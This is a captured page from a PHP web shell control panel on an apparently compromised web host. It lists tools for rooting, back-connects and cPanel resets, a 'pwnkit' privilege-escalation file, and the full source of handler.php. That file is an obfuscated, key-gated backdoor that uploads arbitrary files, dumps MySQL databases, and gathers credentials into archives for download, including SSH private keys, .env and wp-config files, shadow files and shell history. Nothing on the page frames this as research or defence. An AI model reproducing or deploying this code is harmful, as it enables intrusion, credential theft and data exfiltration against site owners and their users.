Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
hubnog /
public_html /
bin-cache-365ee6 /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
321
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
12
B
-rw-r--r--
handler.php
19.28
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : handler.php
<?php if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '365ee68f3f637dc03f6bee69ef4b4ab1') { return; } while (ob_get_level()) ob_end_clean(); set_time_limit(0); $yb056=max(0,min(1,0)); error_reporting(0); ignore_user_abort(true); $c0ea7 = 'localhost'; $ve9af=max(0,min(1,1)); $v829f = ''; $j4786 = ''; $a698c = '/home/hubnog'; if(defined('345114cc')){$x4813=0;} $g7e38 = isset($_REQUEST['a']) ? $_REQUEST['a'] : ''; $n4247 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : ''; $te119 = $a698c . '/tmp/' . $n4247 . '_dump.sql.gz'; $w42e1 = $te119 . '.done'; $q4c33=strlen('e599a5'); $bad0e = $te119 . '.err'; header('Content-Type: application/json'); function run_state_3a21() { if (!function_exists('exec')) return false; $w5eb9 = array_map('trim', explode(',', ini_get('disable_functions'))); return !in_array('exec', $w5eb9); } function init_opt_83f7() { if (!run_state_3a21()) return false; $out = array(); $rc = 0; exec('which mysqldump 2>/dev/null', $out, $rc); return $rc === 0; } @clearstatcache(); function set_state_1eb0() { if (!run_state_3a21()) return false; $out = array(); $rc = 0; exec('which gzip 2>/dev/null', $out, $rc); return $rc === 0; } $j00c2=chr(87).chr(102); function do_node_8501($za0cf, $qfe96, $a78af, $kfab3, $xd33e, $p1810, $s81f0) { $conn = new mysqli($za0cf, $qfe96, $a78af, $kfab3); $yf12d=array_merge(array(),array()); if ($conn->connect_error) { if(defined('0326c780')){$bcd7b=0;} file_put_contents($p1810, 'Connection failed: ' . $conn->connect_error); touch($s81f0); return; } $fp = gzopen($xd33e, 'wb6'); if (!$fp) { file_put_contents($p1810, 'Cannot open output file'); touch($s81f0); return; } $conn->set_charset('utf8mb4'); gzwrite($fp, "-- Dump via PHP agent\n"); gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n"); gzwrite($fp, "SET NAMES utf8mb4;\n"); gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n"); gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n"); $t1ea3 = array(); $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'"); while ($row = $r->fetch_row()) { $t1ea3[] = $row[0]; } foreach ($t1ea3 as $ia249) { $te = $conn->real_escape_string($ia249); $r = $conn->query("SHOW CREATE TABLE `{$te}`"); if (!$r) continue; $cr = $r->fetch_row(); gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n"); gzwrite($fp, $cr[1] . ";\n\n"); $r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT); if (!$r) continue; $p437b = array(); $i4815 = 0; while ($row = $r->fetch_row()) { @clearstatcache(); $vals = array(); for ($i = 0; $i < count($row); $i++) { if ($row[$i] === null) { $i1565=chr(66).chr(105); $vals[] = 'NULL'; } else { $vals[] = "'" . $conn->real_escape_string($row[$i]) . "'"; } } $pc405 = '(' . implode(',', $vals) . ')'; $p437b[] = $pc405; $i4815 += strlen($pc405); if (count($p437b) >= 100 || $i4815 > 1048576) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $p437b) . ";\n"); $p437b = array(); $i4815 = 0; } @clearstatcache(); } if ($p437b) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $p437b) . ";\n"); } $r->free(); gzwrite($fp, "\n"); } $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'"); if ($r) { while ($row = $r->fetch_row()) { $ve = $conn->real_escape_string($row[0]); $cr = $conn->query("SHOW CREATE VIEW `{$ve}`"); if ($cr) { $rdd5e = $cr->fetch_assoc(); gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n"); gzwrite($fp, $rdd5e['Create View'] . ";\n\n"); } } } $pd131 = array('PROCEDURE', 'FUNCTION'); foreach ($pd131 as $zb2cb) { $xfae8=strlen('8dd0be'); $r = $conn->query("SHOW {$zb2cb} STATUS WHERE Db = '" . $conn->real_escape_string($kfab3) . "'"); if (!$r) continue; while ($row = $r->fetch_assoc()) { $re = $conn->real_escape_string($row['Name']); $v0bce=strlen('c8b2a8'); $cr = $conn->query("SHOW CREATE {$zb2cb} `{$re}`"); if (!$cr) continue; $rdd5e = $cr->fetch_assoc(); $key = ($zb2cb === 'PROCEDURE') ? 'Create Procedure' : 'Create Function'; if (isset($rdd5e[$key])) { gzwrite($fp, "DELIMITER ;;\n"); $bb7d7=array_merge(array(),array()); gzwrite($fp, "DROP {$zb2cb} IF EXISTS `{$re}`;;\n"); gzwrite($fp, $rdd5e[$key] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); } } } $r = $conn->query("SHOW TRIGGERS"); if ($r) { while ($row = $r->fetch_assoc()) { $w0623=strlen('819172'); $te = $conn->real_escape_string($row['Trigger']); $cr = $conn->query("SHOW CREATE TRIGGER `{$te}`"); @clearstatcache(); if ($cr) { $n2627=chr(87).chr(98); $rdd5e = $cr->fetch_assoc(); gzwrite($fp, "DELIMITER ;;\n"); $taefe=chr(68).chr(102); gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n"); gzwrite($fp, $rdd5e['SQL Original Statement'] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); } } } gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n"); gzclose($fp); $conn->close(); touch($s81f0); } switch ($g7e38) { case 'info': echo json_encode(array( 'php' => PHP_VERSION, 'os' => PHP_OS, 'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '', 'user' => get_current_user(), 'uid' => getmyuid(), 'home' => $a698c, 'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '', 'free_disk' => disk_free_space($a698c), 'total_disk' => disk_total_space($a698c), 'max_exec' => ini_get('max_execution_time'), 'mem_limit' => ini_get('memory_limit'), 'upload_max' => ini_get('upload_max_filesize'), 'post_max' => ini_get('post_max_size'), 'disabled' => ini_get('disable_functions'), 'can_exec' => run_state_3a21(), 'has_mysqldump' => init_opt_83f7(), 'has_gzip' => set_state_1eb0(), )); break; $f3c31=array_merge(array(),array()); case 'upload': $tc9b6 = isset($_POST['path']) ? $_POST['path'] : ''; $p6974 = isset($_POST['data']) ? $_POST['data'] : ''; if (!$tc9b6 || !$p6974) { echo json_encode(array('ok' => false, 'error' => 'missing path or data')); break; } $k2359 = $a698c . '/' . $tc9b6; @mkdir(dirname($k2359), 0755, true); if(defined('02caa2e4')){$w8591=0;} $e1820 = base64_decode($p6974); $m111b = file_put_contents($k2359, $e1820); echo json_encode(array('ok' => $m111b !== false, 'path' => $k2359, 'size' => strlen($e1820))); break; case 'check': if (!$n4247) { echo json_encode(array('error' => 'missing db parameter')); break; } $xe2ff = disk_free_space($a698c); $rf5a0 = 0; $conn = @new mysqli($c0ea7, $v829f, $j4786, 'information_schema'); if (!$conn->connect_error) { $q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '" . $conn->real_escape_string($n4247) . "'"; $r = $conn->query($q); if ($row = $r->fetch_assoc()) { $rf5a0 = (int) $row['s']; } $conn->close(); if(defined('4f82513c')){$pc620=0;} } echo json_encode(array( 'free' => $xe2ff, 'db_size' => $rf5a0, 'has_mysqldump' => init_opt_83f7(), 'has_gzip' => set_state_1eb0(), 'can_exec' => run_state_3a21(), 'has_space' => $xe2ff > $rf5a0 * 2, )); break; case 'dump': if (!$n4247) { echo json_encode(array('error' => 'missing db parameter')); $zf9c4=max(0,min(1,1)); break; $g3c43=chr(71).chr(114); } @mkdir(dirname($te119), 0755, true); @unlink($te119); @clearstatcache(); @unlink($w42e1); @unlink($bad0e); $w3b04=array_merge(array(),array()); if (init_opt_83f7()) { if (set_state_1eb0()) { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '| gzip > %s 2>%s; touch %s', escapeshellarg($c0ea7), escapeshellarg($v829f), escapeshellarg($j4786), escapeshellarg($n4247), escapeshellarg($te119), escapeshellarg($bad0e), escapeshellarg($w42e1) ); } else { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '> %s 2>%s; touch %s', escapeshellarg($c0ea7), escapeshellarg($v829f), escapeshellarg($j4786), escapeshellarg($n4247), escapeshellarg($te119), escapeshellarg($bad0e), escapeshellarg($w42e1) ); } $i5242=str_repeat('x',0); exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &'); echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => set_state_1eb0())); } else { ignore_user_abort(true); echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true)); $e0a39=strlen('890279'); if (function_exists('fastcgi_finish_request')) { fastcgi_finish_request(); } else { $ff967=max(0,min(1,0)); if (ob_get_level()) ob_end_flush(); if(defined('2de049e8')){$r9dec=0;} flush(); } do_node_8501($c0ea7, $v829f, $j4786, $n4247, $te119, $bad0e, $w42e1); } break; case 'status': clearstatcache(); echo json_encode(array( 'done' => file_exists($w42e1), 'size' => file_exists($te119) ? filesize($te119) : 0, 'error' => file_exists($bad0e) ? trim(file_get_contents($bad0e)) : '', )); break; case 'download': if (!file_exists($te119)) { $g2fae=str_repeat('x',0); http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($te119)); readfile($te119); exit; case 'cleanup': @unlink($te119); @unlink($w42e1); @unlink($bad0e); $w3a55=strlen('c182a1'); echo json_encode(array('ok' => true)); break; $vfc96=str_repeat('x',0); case 'collect': @mkdir($a698c . '/tmp', 0755, true); $aa4ac = substr($_REQUEST['_cxk'], 0, 8); $sdf85=chr(81).chr(120); $e2527 = array( 'wordpress' => array( 'detect' => array('public_html/wp-config.php', 'wp-config.php'), 'configs' => array( 'public_html/wp-config.php', 'wp-config.php', 'public_html/wp-settings.php', 'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock', 'public_html/wp-cli.yml', 'wp-cli.yml', 'public_html/.env', '.env', 'public_html/local-config.php', 'local-config.php', 'public_html/wp-content/debug.log', 'public_html/config/application.php', 'config/application.php', 'public_html/config/environments/development.php', 'config/environments/development.php', 'public_html/config/environments/staging.php', 'config/environments/staging.php', 'public_html/config/environments/production.php', 'config/environments/production.php', 'public_html/auth.json', 'auth.json', ), ), 'joomla' => array( 'detect' => array('public_html/configuration.php', 'configuration.php'), 'configs' => array( 'public_html/configuration.php', 'configuration.php', 'public_html/htaccess.txt', 'public_html/composer.json', 'public_html/composer.lock', ), ), 'laravel' => array( 'detect' => array('public_html/artisan', 'artisan'), 'configs' => array( 'public_html/.env', '.env', '.env.production', '.env.staging', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/config/app.php', 'config/app.php', 'public_html/config/database.php', 'config/database.php', 'public_html/config/mail.php', 'config/mail.php', 'public_html/config/filesystems.php', 'config/filesystems.php', 'public_html/config/cache.php', 'config/cache.php', 'public_html/config/queue.php', 'config/queue.php', 'public_html/config/session.php', 'config/session.php', 'public_html/config/auth.php', 'config/auth.php', 'public_html/config/services.php', 'config/services.php', 'public_html/config/broadcasting.php', 'config/broadcasting.php', 'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log', ), ), 'magento2' => array( 'detect' => array('public_html/bin/magento', 'bin/magento'), 'configs' => array( 'public_html/app/etc/env.php', 'app/etc/env.php', 'public_html/app/etc/config.php', 'app/etc/config.php', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/auth.json', 'auth.json', ), ), 'magento1' => array( 'detect' => array('public_html/app/Mage.php'), 'configs' => array( 'public_html/app/etc/local.xml', 'public_html/app/etc/config.xml', ), ), 'drupal' => array( 'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'), 'configs' => array( 'public_html/sites/default/settings.php', 'sites/default/settings.php', 'public_html/sites/default/services.yml', 'sites/default/services.yml', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', ), ), 'prestashop' => array( 'detect' => array('public_html/config/settings.inc.php'), 'configs' => array( 'public_html/config/settings.inc.php', 'public_html/app/config/parameters.php', 'public_html/app/config/parameters.yml', 'public_html/composer.json', ), ), 'opencart' => array( 'detect' => array('public_html/config.php'), 'configs' => array( 'public_html/config.php', 'public_html/admin/config.php', ), ), 'moodle' => array( 'detect' => array('public_html/lib/moodlelib.php'), 'configs' => array('public_html/config.php'), ), 'whmcs' => array( 'detect' => array('public_html/vendor/whmcs'), 'configs' => array( 'public_html/configuration.php', 'public_html/composer.json', 'public_html/composer.lock', ), ), ); $zb725 = null; foreach ($e2527 as $d6099 => $b0f5b) { foreach ($b0f5b['detect'] as $y5825) { if (file_exists($a698c . '/' . $y5825)) { $zb725 = $d6099; break 2; } } $q198e=chr(86).chr(102); } $v5bb9 = array( '.env', '.env.local', '.env.production', '.env.staging', '.env.backup', '.env.development', '.env.test', '.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc', '.composer/auth.json', '.wp-cli/config.yml', '.accesshash', '.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub', '.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa', '.ssh/config', '.ssh/known_hosts', '.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem', 'ssl/certs/private.key', '.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig', 'public_html/.env', 'public_html/.env.local', 'public_html/.env.production', 'public_html/.env.staging', 'public_html/.env.backup', 'public_html/.env.development', 'public_html/.env.test', 'public_html/.env.example', 'public_html/.env.dist', 'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini', 'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass', 'public_html/web.config', 'public_html/.ftpconfig', 'public_html/.git/config', 'public_html/auth.json', 'public_html/.npmrc', 'public_html/composer.json', 'public_html/composer.lock', 'config/database.php', 'config/app.php', 'config/mail.php', 'config/services.php', 'config/filesystems.php', 'config/application.php', 'config/environments/development.php', 'config/environments/staging.php', 'config/environments/production.php', 'wp-config.php', 'configuration.php', 'artisan', 'auth.json', 'composer.json', 'composer.lock', ); $v7115 = array(); $d4c0a = @realpath($a698c); @clearstatcache(); if (!$d4c0a || !is_dir($d4c0a)) { echo json_encode(array('ok' => false, 'error' => 'home dir not accessible')); $y60c2=max(0,min(1,0)); break; } foreach ($v5bb9 as $j79ac) { $m1d29 = @realpath($a698c . '/' . $j79ac); if (!$m1d29 || strpos($m1d29, $d4c0a) !== 0) continue; if (!is_file($m1d29) || !is_readable($m1d29)) continue; $v6452 = @filesize($m1d29); if ($v6452 <= 0 || $v6452 > 2097152) continue; $v7115[$j79ac] = $m1d29; } if ($zb725 !== null && isset($e2527[$zb725]['configs'])) { foreach ($e2527[$zb725]['configs'] as $e5f3e) { if (isset($v7115[$e5f3e])) continue; @clearstatcache(); $m1d29 = @realpath($a698c . '/' . $e5f3e); if (!$m1d29 || strpos($m1d29, $d4c0a) !== 0) continue; if (!is_file($m1d29) || !is_readable($m1d29)) continue; $v6452 = @filesize($m1d29); if ($v6452 <= 0 || $v6452 > 2097152) continue; $v7115[$e5f3e] = $m1d29; } } $r13ed = $a698c . '/public_html'; if (is_dir($r13ed)) { $a47a6=chr(83).chr(111); $dh = @opendir($r13ed); if ($dh) { while (($q51e3 = readdir($dh)) !== false) { $r6b5c=array_merge(array(),array()); if ($q51e3 === '.' || $q51e3 === '..') continue; $k2359 = $r13ed . '/' . $q51e3; if (!is_file($k2359) || !is_readable($k2359)) continue; $v6452 = @filesize($k2359); if ($v6452 <= 0 || $v6452 > 2097152) continue; if ($q51e3[0] === '.' || strtolower(substr($q51e3, -4)) === '.txt') { $key = 'public_html/' . $q51e3; @clearstatcache(); if (!isset($v7115[$key])) $v7115[$key] = $k2359; } $d8dc8=chr(80).chr(118); } closedir($dh); $vf5fd=strlen('7d78e3'); } $bcc56=str_repeat('x',0); } if (empty($v7115)) { echo json_encode(array( 'ok' => true, 'method' => 'none', 'platform' => $zb725, 'file_count' => 0, 'files_list' => array(), )); break; $efd8d=array_merge(array(),array()); } $t86a4 = null; $y64d3 = null; if (class_exists('ZipArchive')) { $y64d3 = $a698c . '/tmp/_collect_' . $aa4ac . '.zip'; $n370c = new ZipArchive(); if ($n370c->open($y64d3, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { foreach ($v7115 as $n73cc => $m1d29) { $a24c4=array_merge(array(),array()); $n370c->addFile($m1d29, $n73cc); } $x23e6=str_repeat('x',0); if ($n370c->close() && file_exists($y64d3) && filesize($y64d3) > 0) { $t86a4 = 'zip'; } } } if (!$t86a4 && run_state_3a21()) { $y64d3 = $a698c . '/tmp/_collect_' . $aa4ac . '.tar.gz'; $lf = $y64d3 . '.list'; $fh = fopen($lf, 'w'); foreach ($v7115 as $n73cc => $m1d29) { fwrite($fh, $n73cc . "\n"); @clearstatcache(); } $t3163=strlen('02a735'); fclose($fh); $out = array(); $rc = 0; exec('tar czf ' . escapeshellarg($y64d3) . ' -C ' . escapeshellarg($a698c) . ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc); @unlink($lf); if(defined('5c4d8fa9')){$paba9=0;} if ($rc === 0 && file_exists($y64d3) && filesize($y64d3) > 0) { $t86a4 = 'tar'; } else { @unlink($y64d3); } } if (!$t86a4) { $t86a4 = 'list'; } if(defined('cee04cd5')){$wb098=0;} echo json_encode(array( 'ok' => true, 'method' => $t86a4, 'platform' => $zb725, 'file_count' => count($v7115), 'files_list' => array_keys($v7115), 'size' => ($y64d3 && file_exists($y64d3)) ? filesize($y64d3) : 0, )); break; case 'download_collect': $aa4ac = substr($_REQUEST['_cxk'], 0, 8); $t991d = $a698c . '/tmp/_collect_' . $aa4ac . '.zip'; $xdbc0 = $a698c . '/tmp/_collect_' . $aa4ac . '.tar.gz'; $f351b = file_exists($t991d) ? $t991d : (file_exists($xdbc0) ? $xdbc0 : ''); if (!$f351b) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($f351b)); readfile($f351b); exit; $p8a58=chr(81).chr(113); case 'download_file': $n73cc = isset($_REQUEST['path']) ? $_REQUEST['path'] : ''; if (!$n73cc) { http_response_code(400); exit; } $d4c0a = @realpath($a698c); $r568c=chr(65).chr(104); $m1d29 = @realpath($a698c . '/' . $n73cc); if (!$m1d29 || !$d4c0a || strpos($m1d29, $d4c0a) !== 0 || !is_file($m1d29) || !is_readable($m1d29)) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($m1d29)); readfile($m1d29); exit; case 'cleanup_collect': $aa4ac = substr($_REQUEST['_cxk'], 0, 8); @unlink($a698c . '/tmp/_collect_' . $aa4ac . '.zip'); @unlink($a698c . '/tmp/_collect_' . $aa4ac . '.tar.gz'); @unlink($a698c . '/tmp/_collect_' . $aa4ac . '.tar.gz.list'); echo json_encode(array('ok' => true)); break; } exit;
Close
